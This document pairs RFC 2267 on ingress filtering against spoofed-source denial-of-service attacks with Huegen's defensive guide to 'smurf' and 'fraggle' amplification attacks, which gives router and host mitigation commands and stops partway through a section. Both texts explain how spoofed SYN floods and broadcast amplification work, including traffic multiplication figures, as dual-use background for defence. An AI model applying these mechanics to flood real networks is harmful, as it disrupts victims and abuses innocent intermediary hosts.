ne12abaa3_hacking

Network Working Group P. Ferguson
Request for Comments: 2267 Cisco Systems, Inc.
Category: Informational D. Senie
BlazeNet, Inc.
January 1998

Network Ingress Filtering:
Defeating Denial of Service Attacks which employ
IP Source Address Spoofing

Status of this Memo

This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.

Copyright Notice

Copyright (C) The Internet Society (1998). All Rights Reserved.

Abstract

Recent occurrences of various Denial of Service (DoS) attacks which
have employed forged source addresses have proven to be a troublesome
issue for Internet Service Providers and the Internet community
overall. This paper discusses a simple, effective, and
straightforward method for using ingress traffic filtering to
prohibit DoS attacks which use forged IP addresses to be propagated
from 'behind' an Internet Service Provider's (ISP) aggregation point.

Table of Contents

1. Introduction . . . . . . . . . . . . . . . . . . . . . . . 2
2. Background . . . . . . . . . . . . . . . . . . . . . . . . 2
3. Restricting forged traffic . . . . . . . . . . . . . . . . 5
4. Further capabilities for networking equipment. . . . . . . 6
5. Liabilities. . . . . . . . . . . . . . . . . . . . . . . . 6
6. Summary. . . . . . . . . . . . . . . . . . . . . . . . . . 7
7. Security Considerations. . . . . . . . . . . . . . . . . . 7
8. Acknowledgments . . . . . . . . . . . . . . . . . . . . . 8
9. References . . . . . . . . . . . . . . . . . . . . . . . . 8
10. Authors' Addresses . . . . . . . . . . . . . . . . . . . . 9
11. Full Copyright Statement . . . . . . . . . . . . . . . . . 10

Ferguson & Senie Informational [Page 1]

RFC 2267 Network Ingress Filtering January 1998

1. Introduction

A resurgence of Denial of Service Attacks [1] aimed at various
targets in the Internet have produced new challenges within the
Internet Service Provider (ISP) and network security communities to
find new and innovative methods to mitigate these types of attacks.
The difficulties in reaching this goal are numerous; some simple
tools already exist to limit the effectiveness and scope of these
attacks, but they have not been widely implemented.

This method of attack has been known for some time. Defending against
it, however, has been an ongoing concern. Bill Cheswick is quoted in
[2] as saying that he pulled a chapter from his book, "Firewalls and
Internet Security" [3], at the last minute because there was no way
for an administrator of the system under attack to effectively defend
the system. By mentioning the method, he was concerned about
encouraging it's use.

While the filtering method discussed in this document does
absolutely nothing to protect against flooding attacks which
originate from valid prefixes (IP addresses), it will prohibit an
attacker within the originating network from launching an attack of
this nature using forged source addresses that do not conform to
ingress filtering rules. All providers of Internet connectivity are
urged to implement filtering described in this document to prohibit
attackers from using forged source addresses which do not reside
within a range of legitimately advertised prefixes. In other words,
if an ISP is aggregating routing announcements for multiple
downstream networks, strict traffic filtering should be used to
prohibit traffic which claims to have originated from outside of
these aggregated announcements.

An additional benefit of implementing this type of filtering is that
it enables the originator to be easily traced to it's true source,
since the attacker would have to use a valid, and legitimately
reachable, source address.

2. Background

A simplified diagram of the TCP SYN flooding problem is depicted
below:

9.0.0.0/8
host <----- router <--- Internet <----- router <-- attacker

TCP/SYN
<---------------------------------------------
Source: 192.168.0.4/32

Ferguson & Senie Informational [Page 2]

RFC 2267 Network Ingress Filtering January 1998

SYN/ACK
no route
TCP/SYN
<---------------------------------------------
Source: 10.0.0.13/32
SYN/ACK
no route
TCP/SYN
<---------------------------------------------
Source: 172.16.0.2/32
SYN/ACK
no route

[etc.]

Assume:

o The "host" is the targeted machine.

o The attacker resides within the "valid" prefix, 9.0.0.0/8.

o The attacker launches the attack using randomly changing source
addresses; in this example, the source addresses are depicted as
from within [4], which are not generally present in the global
Internet routing tables, and therefore, unreachable. However, any
unreachable prefix could be used to perpetrate this attack
method.

Also worthy of mention is a case wherein the source address is forged
to appear to have originated from within another legitimate network
which appears in the global routing table(s). For example, an
attacker using a valid network address could wreak havoc by making
the attack appear to come from an organization which did not, in
fact, originate the attack and was completely innocent. In such
cases, the administrator of a system under attack may be inclined to
filter all traffic coming from the apparent attack source. Adding
such a filter would then result in a denial of service to
legitimate, non-hostile end-systems. In this case, the administrator
of the system under attack unwittingly becomes an accomplice of the
attacker.

Further complicating matters, TCP SYN flood attacks will result in
SYN-ACK packets being sent to one or many hosts which have no
involvement in the attack, but which become secondary victims. This
allows the attacker to abuse two or more systems at once.

Ferguson & Senie Informational [Page 3]

RFC 2267 Network Ingress Filtering January 1998

Similar attacks have been attempted using UDP and ICMP flooding.
The former attack (UDP flooding) uses forged packets to try and
connect the chargen UDP service to the echo UDP service at another
site. Systems administrators should NEVER allow UDP packets destined
for system diagnostic ports from outside of their administrative
domain to reach their systems. The latter attack (ICMP flooding),
uses an insidious feature in IP subnet broadcast replication
mechanics. This attack relies on a router serving a large multi-
access broadcast network to frame an IP broadcast address (such as
one destined for 10.255.255.255) into a Layer 2 broadcast frame (for
ethernet, FF:FF:FF:FF:FF:FF). Ethernet NIC hardware (MAC-layer
hardware, specifically) will only listen to a select number of
addresses in normal operation. The one MAC address that all devices
share in common in normal operation is the media broadcast, or
FF:FF:FF:FF:FF:FF. In this case, a device will take the packet and
send an interrupt for processing. Thus, a flood of these broadcast
frames will consume all available resources on an end-system [9]. It
is perhaps prudent that system administrators should consider
ensuring that their border routers do not allow directed broadcast
packets to be forwarded through their routers as a default.

When an TCP SYN attack is launched using unreachable source address,
the target host attempts to reserve resources waiting for a
response. The attacker repeatedly changes the bogus source address
on each new packet sent, thus exhausting additional host resources.

Alternatively, if the attacker uses someone else's valid host
address as the source address, the system under attack will send a
large number of SYN/ACK packets to what it believes is the originator
of the connection establishment sequence. In this fashion, the
attacker does damage to two systems: the destination target system,
as well as the system which is actually using the spoofed address in
the global routing system.

The result of both attack methods is extremely degraded performance,
or worse, a system crash.

In response to this threat, most operating system vendors have
modified their software to allow the targeted servers to sustain
attacks with very high connection attempt rates. This is a welcome
and necessary part of the solution to the problem. Ingress filtering
will take time to be implemented pervasively and be fully effective,
but the extensions to the operating systems can be implemented
quickly. This combination should prove effective against source
address spoofing. See [1] for vendor and platform software upgrade
information.

Ferguson & Senie Informational [Page 4]

RFC 2267 Network Ingress Filtering January 1998

3. Restricting forged traffic

The problems encountered with this type of attack are numerous, and
involve shortcomings in host software implementations, routing
methodologies, and the TCP/IP protocols themselves. However, by
restricting transit traffic which originates from a downstream
network to known, and intentionally advertised, prefix(es), the
problem of source address spoofing can be virtually eliminated in
this attack scenario.

11.0.0.0/8
/
router 1
/
/
/ 9.0.0.0/8
ISP <----- ISP <---- ISP <--- ISP <-- router <-- attacker
A B C D 2
/
/
/
router 3
/
12.0.0.0/8

In the example above, the attacker resides within 9.0.0.0/8, which is
provided Internet connectivity by ISP D. An input traffic filter on
the ingress (input) link of "router 2", which provides connectivity
to the attacker's network, restricts traffic to allow only traffic
originating from source addresses within the 9.0.0.0/8 prefix, and
prohibits an attacker from using "invalid" source addresses which
reside outside of this prefix range.

In other words, the ingress filter on "router 2" above would check:

IF packet's source address from within 9.0.0.0/8
THEN forward as appropriate

IF packet's source address is anything else
THEN deny packet

Network administrators should log information on packets which are
dropped. This then provides a basis for monitoring any suspicious
activity.

Ferguson & Senie Informational [Page 5]

RFC 2267 Network Ingress Filtering January 1998

4. Further possible capabilities for networking equipment

Additional functions should be considered for future platform
implementations. The following one is worth noting:

o Implementation of automatic filtering on remote access servers.
In most cases, a user dialing into an access server is an
individual user on a single PC. The ONLY valid source IP address
for packets originating from that PC is the one assigned by the
ISP (whether statically or dynamically assigned). The remote
access server could check every packet on ingress to ensure the
user is not spoofing the source address on the packets which he
is originating. Obviously, provisions also need to be made for
cases where the customer legitimately is attaching a net or
subnet via a remote router, but this could certainly be
implemented as an optional parameter. We have received reports
that some vendors and some ISPs are already starting to
implement this capability.

We considered suggesting routers also validate the source IP address
of the sender as suggested in [8], but that methodology will not
operate well in the real networks out there today. The method
suggested is to look up source addresses to see that the return path
to that address would flow out the same interface as the packet
arrived upon. With the number of asymmetric routes in the Internet,
this would clearly be problematic.

5. Liabilities

Filtering of this nature has the potential to break some types of
"special" services. It is in the best interest of the ISP offering
these types of special services, however, to consider alternate
methods of implementing these services to avoid being affected by
ingress traffic filtering.

Mobile IP, as defined in [6], is specifically affected by ingress
traffic filtering. As specified, traffic to the mobile node is
tunneled, but traffic from the mobile node is not tunneled. This
results in packets from the mobile node(s) which have source
addresses that do not match with the network where the station is
attached. The Mobile IP Working Group is addressing this problem by
specifying "reverse tunnels" in [7]. This work in progress provides
a method for the data transmitted from the mobile node to be tunneled
to the home agent before transmission to the Internet. There are
additional benefits to the reverse tunneling scheme, including better
handling of multicast traffic. Those implementing mobile IP systems
are encouraged to implement this method of reverse tunneling.

Ferguson & Senie Informational [Page 6]

RFC 2267 Network Ingress Filtering January 1998

As mentioned previously, while ingress traffic filtering drastically
reduces the success of source address spoofing, it does not preclude
an attacker using a forged source address of another host within the
permitted prefix filter range. It does, however, ensure that when an
attack of this nature does indeed occur, a network administrator can
be sure that the attack is actually originating from within the known
prefixes that are being advertised. This simplifies tracking down the
culprit, and at worst, the administrator can block a range of source
addresses until the problem is resolved.

If ingress filtering is used in an environment where DHCP or BOOTP is
used, the network administrator would be well advised to ensure that
packets with a source address of 0.0.0.0 and a destination of
255.255.255.255 are allowed to reach the relay agent in routers when
appropriate. The scope of directed broadcast replication should be
controlled, however, and not arbitrarily forwarded.

6. Summary

Ingress traffic filtering at the periphery of Internet connected
networks will reduce the effectiveness of source address spoofing
denial of service attacks. Network service providers and
administrators have already begun implementing this type of filtering
on periphery routers, and it is recommended that all service
providers do so as soon as possible. In addition to aiding the
Internet community as a whole to defeat this attack method, it can
also assist service providers in locating the source of the attack if
service providers can categorically demonstrate that their network
already has ingress filtering in place on customer links.

Corporate network administrators should implement filtering to ensure
their corporate networks are not the source of such problems. Indeed,
filtering could be used within an organization to ensure users do not
cause problems by improperly attaching systems to the wrong networks.
The filtering could also, in practice, block a disgruntled employee
from anonymous attacks.

It is the responsibility of all network administrators to ensure they
do not become the unwitting source of an attack of this nature.

7. Security Considerations

The primary intent of this document is to inherently increase
security practices and awareness for the Internet community as a
whole; as more Internet Providers and corporate network
administrators implement ingress filtering, the opportunity for an
attacker to use forged source addresses as an attack methodology will
significantly lessen. Tracking the source of an attack is simplified

Ferguson & Senie Informational [Page 7]

RFC 2267 Network Ingress Filtering January 1998

when the source is more likely to be "valid." By reducing the number
and frequency of attacks in the Internet as a whole, there will be
more resources for tracking the attacks which ultimately do occur.

8. Acknowledgments

The North American Network Operators Group (NANOG) [5] group as a
whole deserves special credit for openly discussing these issues and
actively seeking possible solutions. Also, thanks to Justin Newton
[Priori Networks] and Steve Bielagus [OpenROUTE Networks, Inc.] for
their comments and contributions.

9. References

[1] CERT Advisory CA-96.21; TCP SYN Flooding and IP Spoofing
Attacks; September 24, 1996.

[2] B. Ziegler, "Hacker Tangles Panix Web Site", Wall Street
Journal, 12 September 1996.

[3] "Firewalls and Internet Security: Repelling the Wily Hacker";
William R. Cheswick and Steven M. Bellovin, Addison-Wesley
Publishing Company, 1994; ISBN 0-201-63357-4.

[4] Rekhter, Y., Moskowitz, R., Karrenberg, D., de Groot, G., and
E. Lear, "Address Allocation for Private Internets", RFC 1918,
February 1996.

[5] The North American Network Operators Group;
http://www.nanog.org.

[6] Perkins, C., "IP Mobility Support", RFC 2002, October 1996.

[7] Montenegro, G., "Reverse Tunneling Mobile IP",
Work in Progress.

[8] Baker, F., "Requirements for IP Version 4 Routers", RFC 1812,
June 1995.

[9] Thanks to: Craig Huegen;
See: http://www.quadrunner.com/~chuegen/smurf.txt.

Ferguson & Senie Informational [Page 8]

RFC 2267 Network Ingress Filtering January 1998

10. Authors' Addresses

Paul Ferguson
cisco Systems, Inc.
400 Herndon Parkway
Herndon, VA USA 20170

EMail: ferguson@cisco.com

Daniel Senie
BlazeNet, Inc.
4 Mechanic Street
Natick, MA USA 01760

EMail: dts@senie.com

Ferguson & Senie Informational [Page 9]

RFC 2267 Network Ingress Filtering January 1998

11. Full Copyright Statement

Copyright (C) The Internet Society (1998). All Rights Reserved.

This document and translations of it may be copied and furnished to
others, and derivative works that comment on or otherwise explain it
or assist in its implementation may be prepared, copied, published
and distributed, in whole or in part, without restriction of any
kind, provided that the above copyright notice and this paragraph are
included on all such copies and derivative works. However, this
document itself may not be modified in any way, such as by removing
the copyright notice or references to the Internet Society or other
Internet organizations, except as needed for the purpose of
developing Internet standards in which case the procedures for
copyrights defined in the Internet Standards process must be
followed, or as required to translate it into languages other than
English.

The limited permissions granted above are perpetual and will not be
revoked by the Internet Society or its successors or assigns.

This document and the information contained herein is provided on an
"AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.

Ferguson & Senie Informational [Page 10]

THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS

Craig A. Huegen
chuegen@pentics.com

Last Update: Tue Feb 8 17:47:36 PST 2000

(Note: Most of this information is historical and out-of-date. Obviously, we have seen phenomenal growth of Denial-of-Service attacks across the Internet, leveraging security vulnerabilities to assemble networks of compromised hosts which can be used to attack sites, rather than relying upon a big pipe or amplification techniques. Most of this material is left unchanged, for reference.)

New additions:

* Removed "smurf update" section -- no longer valid given distributed DoS

Editor's plea: please distribute this information freely, and abide by my redistribution requirements (see the very end) when doing so. It's important that these attacks be minimized, and communication is the only way to help with this.

1. OVERVIEW:

The information here provides in-depth information regarding "smurf" and "fraggle" attacks, with a focus on Cisco routers and how to reduce the effects of the attack. Some information is general and not related to an organization's particular vendor of choice; however, it is written with a Cisco router focus. No confirmation has been made to the effects on other vendors' equipment; however, others have provided me with information for various vendors, which is provided in the document. See the "Acknowledgements" section below for the sources and contact information. I am happy to accept information from other colleagues or other vendors who are willing to provide information about other vendors' products in relation to this topic.

This paper is always being updated as I receive more information about attacks and work with ways to minimize impact.

2. DESCRIPTION:

The "smurf" attack, named after its exploit program, is one of the most recent in the category of network-level attacks against hosts. A perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast addresses, all of it having a spoofed source address of a victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function noted below, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, there could potentially be hundreds of machines to reply to each packet.

The "smurf" attack's cousin is called "fraggle", which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of "smurf".

Currently, the providers/machines most commonly hit are IRC servers and their providers.

There are two parties who are hurt by this attack... the intermediary (broadcast) devices--let's call them "amplifiers", and the spoofed address target, or the "victim". The victim is the target of a large amount of traffic that the amplifiers generate.

Let's look at the scenario to paint a picture of the dangerous nature of this attack. Assume a co-location switched network with 100 hosts, and that the attacker has a T1. The attacker sends, say, a 768kb/s stream of ICMP echo (ping) packets, with a spoofed source address of the victim, to the broadcast address of the "bounce site". These ping packets hit the bounce site's broadcast network of 100 hosts; each of them takes the packet and responds to it, creating 100 ping replies out-bound. If you multiply the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce site" after the traffic is multiplied. This is then sent to the victim (the spoofed source of the originating packets).

3. HOW TO DETERMINE IF YOUR NETWORK IS VULNERABLE:

Several sites have been established to do both active and passive scanning of networks to determine whether or not directed-broadcast is enabled.

http://www.netscan.org/ is a site which actively scans the IPv4 address space and mails network contacts with information on how to disable them.

http://www.powertech.no/smurf/ is a site which will test scan your network and allow you to enter a known smurf amplifier site.

4. HOW TO KEEP YOUR SITE FROM BEING THE SOURCE PERPETRATORS USE TO ATTACK VICTIMS:

The perpetrators of these attacks rely on the ability to source spoofed packets to the "amplifiers" in order to generate the traffic which causes the denial of service.

In order to stop this, all networks should perform filtering either at the edge of the network where customers connect (access layer) or at the edge of the network with connections to the upstream providers, in order to defeat the possibility of source-address-spoofed packets from entering from downstream networks, or leaving for upstream networks.

Paul Ferguson of cisco Systems and Daniel Senie of BlazeNet have written an RFC pertaining to this topic. See:

ftp://ftp.isi.edu/in-notes/rfc2267.txt

for more information and examples on this subject.

Additionally, router vendors have added or are currently adding options to turn off the ability to spoof IP source addresses by checking the source address of a packet against the routing table to ensure the return path of the packet is through the interface it was received on.

Cisco has added this feature to the current 11.1CC branch, used by many NSP's, in an interface command '[no] ip verify unicast reverse-path'.

See the "other vendors" section for 3Com information regarding this feature.

5. HOW TO STOP BEING AN INTERMEDIARY:

This attack relies on the router serving a large multi-access broadcast network to frame an IP broadcast address (such as 10.255.255.255) into a layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). RFC 1812, "Requirements for IP Version 4 Routers", Section 5.3.5, specifies:

---
A router MAY have an option to disable receiving network-prefix-
directed broadcasts on an interface and MUST have an option to
disable forwarding network-prefix-directed broadcasts. These options
MUST default to permit receiving and forwarding network-prefixdirected
broadcasts.
---

Generally, with IP providers and IP applications as we know them today, this behavior should not be needed, and it is recommended that directed-broadcasts be turned off, to suppress the effects of this attack.

RFC 2644, a Best Current Practice RFC by Daniel Senie, updates RFC 1812 to state that router software must default to denying the forwarding and receipt of directed broadcasts.

Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen to a select number of addresses in normal operation. The one MAC address that all devices share in common in normal operation is the media broadcast, or FF:FF:FF:FF:FF:FF. If a device receives a packet destined to the broadcast link-layer address, it will take the packet and send an interrupt for processing by the higher-layer routines.

To stop your Cisco router from converting these layer 3 broadcasts into layer 2 broadcasts, use the "no ip directed-broadcast" interface configuration command. This should be configured on each interface of all routers.

As of Cisco IOS version 12.0, "no ip directed-broadcast" is now the default in order to protect networks by default. "ip directed-broadcast" will be needed if your network requires directed broadcasts to be enabled.

Other vendor information:

* Proteon/OpenROUTE: Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks routers have an option to turn off directed broadcasts in the IP Configuration menus. The command sequence to turn them off is: *CONFIG (on newer routers) or TALK 6 (on older routers) Config>PROTOCOL IP IP Config>DISABLE DIRECTED-BROADCAST A restart of the router is then required.
* Nortel Networks (Bay Networks): Jon Green (jcgreen@netins.net) reports that bugID CR33408 added the ability to disable network-directed broadcasts beginning in version 12.01 rev 1 of BayRS code. To disable, enter: [1:1]$bcc bcc> config hostname ip ip set directed-bcast disabled ip# exit Note that this will bounce all IP interfaces. Greg Hankins (ghankins@mindspring.net) reports that in BayRS 13.01 and later, directed-broadcast is disabled by default. Tim Winders (twinders@SPC.cc.tx.us) mentions that if you upgrade to BayRS 13.01+ from 12.01, directed-broadcasts are not disabled.
* 3Com NETBuilder products: Mike Kouri (Mike_Kouri@3com.com) reports that all 3Com NETBuilders have an option to keep the router from forwarding the directed broadcasts. The command sequence to disable the forwarding is: SETDefault -IP CONTrol = NoFwdSubnetBcast Additionally, 3Com NETBuilder products running version 9.1 or later can be configured to discard source-spoofed packets: SETDefault !port -FireWall CONTrol = (Filter, DenySrcSpoofing) 3Com states in the web page (listed below) that this command "Specifies whether packets are subject to source-spoofing checks. This is a CPU-intensive option and generally results in performance degradation. You should disable this option except on interfaces where external, untrusted traffic is received. The source address of incoming packets is checked against the routing table. If the routing information shows that the source address is unreachable, or reachable on different interfaces, then it is a SrcSpoofing attack."
* Lucent (Ascend): Will Pierce (willp@dreamscape.com) reports that on Maxes or Pipelines running TAOS 6.0.0 or higher, you can go to the Ethernet->Mod Config menu and set both "Reply DirectedBcast Ping" and "Forward Directed Bcast" to "No". For the Max TNT, there is an example at ftp://ftp.ascend.com/pub/Software-Releases/MaxTNT/Release-2.0.X/2.0.0/doc/tnt20.pdf on page 40. TNT versions 2.0.0 and higher support this.
* Cabletron SmartSwitch Router (Yago/SSR): Greg Hankins (ghankins@mindspring.net) reports directed-broadcast is disabled by default, and can be enabled by entering the global command "ip enable directed-broadcast".
* Foundry Networks: Greg Hankins (ghankins@mindspring.net) reports that hardware running Foundry's routing software can be configured to disable directed-broadcasts with the global or per-interface "no ip directed-broadcast" command.
* Redback Networks: Justin Streiner (streiner@stargate.net) reports that on the SMS-500 and SMS-1000 access switches, there is no support for directed broadcasts unless used in conjunction with DHCP, and they are not forwarded by default.
* Extreme Networks: Aurobindo Sundaram (sundaram@austin.apc.slb.com) reports that you can disable IP broadcast forwarding on Extreme's Summit 1 switches by using the following commands: disable ipforwarding broadcast all disable ipforwarding broadcast vlan vlan-name
* ArrowPoint Communications: Greg Hankins (ghankins@mindspring.net) reports that directed-broadcasts can be disabled by using the "no ip subnet-broadcast" global configuration command.
* SGI IRIX as a router: Mike O'Connor (mjo@dojo.mi.org) reports that IRIX has been configured by default to not forward the directed-broadcasts when used as a router. The tunable for this is in /var/sysgen/master.d/bsd.

There is one case study where this will stop intended behavior: In the case where samba (an SMB server for UNIX) or NT is used to "remote broadcast" into a LAN workgroup so that the workstations on that LAN can see the server, this will prevent the LAN machines from seeing the remote server. This is only in the case where there is no WINS server (WINS is routed unicast) and a "remote broadcast" is being used--it's a rare but notable condition.

(Editor's note: I welcome any comments as to what else breaks without the support for directed-broadcast.)

Additionally, hosts can be patched to refuse to respond to broadcasted ICMP echo packets. RFC 1122, "Requirements for Internet Hosts -- Communications Layer", Section 3.2.2.6, states:

---
An ICMP Echo Request destined to an IP broadcast or IP
multicast address MAY be silently discarded.

DISCUSSION:

This neutral provision results from a passionate debate
between those who feel that ICMP Echo to a broadcast
address provides a valuable diagnostic capability and
those who feel that misuse of this feature can too
easily create packet storms.
---

Because of this, most IP stack implementors have chosen to implement the default support provision, which is to reply to an ICMP Echo Request. As mentioned in the paragraph from the RFC (above), it is perfectly legal for a host to silently discard ICMP echos. Several patches have been found floating about in mailing lists for disabling response to broadcast ICMP echos for the freely-available UNIX systems.

In the case of the smurf or fraggle attack, each host which supports this behavior on a broadcast LAN will happily reply with an ICMP or UDP (smurf or fraggle, respectively) echo-reply packet toward the spoofed source address, the victim.

The following section contains information to configure hosts not to respond to ICMP echo requests to broadcast addresses.

IBM has provided a setting in AIX 4.x to disable responses to broadcast addresses. It is not available in AIX 3.x. Use the "no" command to turn it off or on. NOTE: On AIX 4.x responses are DISABLED by default.

no -o bcastping=0 # disable bcast ping responses (default)

Solaris can be set not to respond to ICMP echo requests. Add the following line to your /etc/rc2.d/S69inet startup:

ndd -set /dev/ip ip_respond_to_echo_broadcast 0

If you're using Solaris as a router, you can configure it not to forward directed broadcasts by placing the following line in your /etc/rc2.d/S69inet startup:

ndd -set /dev/ip ip_forward_directed_broadcasts 0

Starting with version 2.2.5, FreeBSD's IP stack does not respond to icmp echo requests destined to broadcast and multicast addresses by default. The sysctl parameter for this functionality is net.inet.icmp.bmcastecho. Beginning with version 3.x, FreeBSD makes this option configurable in the /etc/rc.conf file with an option under the miscellaneous network configuration section.

Under NetBSD, directed broadcasts can be disabled by using the sysctl command:

sysctl -w net.inet.ip.directed-broadcast=0

Under Linux, one can use the CONFIG_IP_IGNORE_ECHO_REQUESTS variable to completely ignore ICMP echo requests. Of course, this violates RFC 1122. "ipfw" can be used from Linux to block broadcast echos, a la:

Any system with ipfw can be protected by adding rules such as:

ipfwadm -I -a deny -P icmp -D 123.123.123.0 -S 0/0 0 8
ipfwadm -I -a deny -P icmp -D 123.123.123.255 -S 0/0 0 8

(replace 123.123.123.0 and 123.123.123.255 with your base network number and broadcast address, respectively)

To protect a host against "fraggle" attacks on most UNIX machines, one should comment the lines which begin with "echo" and "chargen" in /etc/inetd.conf and restart inetd.

6. INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:

The amount of bandwidth and packets per second (pps) that can be generated by this attack is quite large. With a 200-host LAN, I was able to generate over 80 Mbps traffic at around 35 Kpps toward my target--a pretty significant amount. The victims receive this because traffic is multiplied by the number of hosts on the broadcast network used (in this case, with a 200-host network, I was only required to send 400 Kbps to the broadcast address--less than one-third of a T1).

Many hosts cannot process this many packets per second; many hosts are connected to 10 Mbps Ethernet LANs where more traffic than wire speed is sent. Therefore, the ability to drop these packets at the network border, or even before it flows down the ingress pipes, is desired.

Cisco routers have several "paths" which packets can take to be routed; each has a varying degree of overhead. The slowest of these is "process" switching. This is used when a complex task is required for processing packets. The other modes are variations of a fast path--each of them with a set of advantages and disadvantages. However, they're all handled at interrupt level (no process-level time is required to push these packets).

In IOS versions (even the most recent), access-list denies are handled at the process (slow) level, because they require an ICMP unreachable to be generated to the originating host. All packets were sent to the process level automatically to be handled this way.

Under a recent code change (Cisco bug ID CSCdj35407--integrated in version 11.1(14)CA and later 11.1CA, 11.1CC, 11.1CE, and 12.0 trains), packets denied by an access-list will be dropped at the interrupt (fast) level, with the exception of 2 packets per second per access-list deny line. These 2 packets per second will be used to send the "ICMP unreachable via administrative block" messages. This assumes that you don't want to log the access-list violations (via the "log" or "log-input" keywords). The ability to rate-limit "log-input" access-list lines (in order to more easily log these packets) is currently being integrated; see the section below on tracing spoofed packet attacks for information on logging.

Filtering ICMP echo reply packets destined for your high-profile machines at the ingress interfaces of the network border routers will then permit the packets to be dropped at the earliest possible point. However, it does not mean that the network access pipes won't fill, as the packets will still come down the pipe to be dropped at the router. It will, however, take the load off the system being attacked. Keep in mind that this also denies others from being able to ping from that machine (the replies will never reach the machine).

For those customers of providers who use Cisco, this may give you some leverage with the providers' security teams to help save your pipes by filtering before the traffic is sent to you.

An additional technology you can use to protect your machines is to use committed access rate, or CAR. CAR is a functionality that works with Cisco Express Forwarding, found in 11.1CC, 11.1CE, and 12.0. It allows network operators to limit certain types of traffic to specific sources and/or destinations.

For example, a provider has filtered its IRC server from receiving ICMP echo-reply packets in order to protect it, but many attackers are now attacking other customer machines or network devices in order to fill some network segments.

The provider above chose to use CAR in order to limit all ICMP echo and echo-reply traffic received at the borders to 256 Kbps. An example follows:

! traffic we want to limit
access-list 102 permit icmp any any echo
access-list 102 permit icmp any any echo-reply
! interface configurations for borders
interface Serial3/0/0
rate-limit input access-group 102 256000 8000 8000 conform-action transmit exceed-action drop

This limits ICMP echo and echo-reply traffic to 256 Kbps with a small amount of burst. Multiple "rate-limit" commands can be added to an interface in order to control other kinds of traffic as well.

The command "show interface [interface-name] rate-limit" will show the statistics for rate-limiting; "clear counters [interface-name]" will clear the statistics for a fresh look.

CAR can also be used to limit TCP SYN floods to particular hosts -- without impeding existing connections. Some attackers have started using very high streams of TCP SYN packets in order to harm systems once again.

Here is an example which limits TCP SYN packets directed at host 10.0.0.1 to 8 kbps or so:

! We don't want to limit established TCP sessions -- non-SYN packets
access-list 103 deny tcp any host 10.0.0.1 established
! We do want to limit the rest of TCP (this really only includes SYNs)
access-list 103 permit tcp any host 10.0.0.1
! interface configurations for network borders
interface Serial3/0/0
rate-limit input access-group 103 8000 8000 8000 conform-action transmit exceed-action drop

Currently, CAR is only available for 7200 and 7500 series routers. Additional platform support is planned in 12.0.

Additionally, CAR can be used to set IP precedence; this is beyond the scope of this paper. Consult www.cisco.com for more information on the uses of CAR.

7. TRACING SPOOFED PACKET STREAMS:

Tracking these attacks can prove to be difficult, but is possible with coordination and cooperation from providers. This section also assumes Cisco routers, because I can speak only about the abilities of Cisco to log/filter packets and what impact it may have.

Today, logging packets which pass through or get dropped in an ACL is possible; however, all packets with the "log" or "log-input" ACL options are sent to process level for logging. For a large stream of packets, this could cause excessive CPU problems. For this reason, tracking attacks via IOS logging today is limited to either lower bandwidth attacks (smaller than 10k packets per second). Even then, the number of log messages generated by the router could overload a syslog server.

Cisco bug ID CSCdj35856 addresses this problem. It has been integrated into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a maintenance interim release), and makes it possible to log packets at defined intervals and to process logged packets not at that interval in the fast path. I will update this page with version numbers as the releases are integrated.

Some information on logging:

In later 11.1 versions, a new keyword was introduced for ACL logging: "log-input". A formatted ACL line utilizing the keyword looks like this:

access-list 101 permit icmp any any echo log-input

When applied to an interface, this line will log all ICMP ping packets with input interface and MAC address (for multi-access networks). Point-to-point interfaces will not have a MAC address listed.

Here's an example of the log entry for a multi-access network (FDDI, Ether):

Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets

Here's an example of the log entry for a point-to-point network:

Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (BRI0 PPP) -> 10.0.19.242 (8/0), 1 packet

Substituting "log" for "log-input" will eliminate the incoming interface and MAC address from the log messages.

We'll use the first log entry to demonstrate how to go from here. This log entry means the packet came in on FastEthernet1/0, from MAC address 0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip arp" (if needed) to determine the IP address for the MAC address, and go to the next hop for tracing or contact the necessary peer (in the case of an exchange point). This is a hop-by-hop tracing method.

Example of "show ip arp" used to find next hop:

netlab#show ip arp 0060.3e2f.6e41

Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.0.183.65 32 0060.3e2f.6e41 ARPA FastEthernet1/0

As you can see, 10.0.183.65 is the next hop where the packets came from and we should go there to continue the tracing process, utilizing the same ACL method. By doing this, you can track the spoof attack backwards.

While this is general information on tracking spoofed packets, it must be noted that the victims of a smurf/fraggle attack get packets from the listed source in the packets; i.e., they receive echo-reply packets truly from the source listed in the IP header. This information should be used by the amplifiers or intermediaries to track the spoofed echo request packets back to their source (the perpetrator).

8. OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:

Two other denial of service attacks frequently encountered are TCP SYN floods, and UDP floods aimed at diagnostic ports on hosts.

TCP SYN attacks consist of a large number of spoofed TCP connection set-up messages aimed at a particular service on a host. Older TCP implementations cannot handle many faked connection set-up packets, and will not allow access to the victim service.

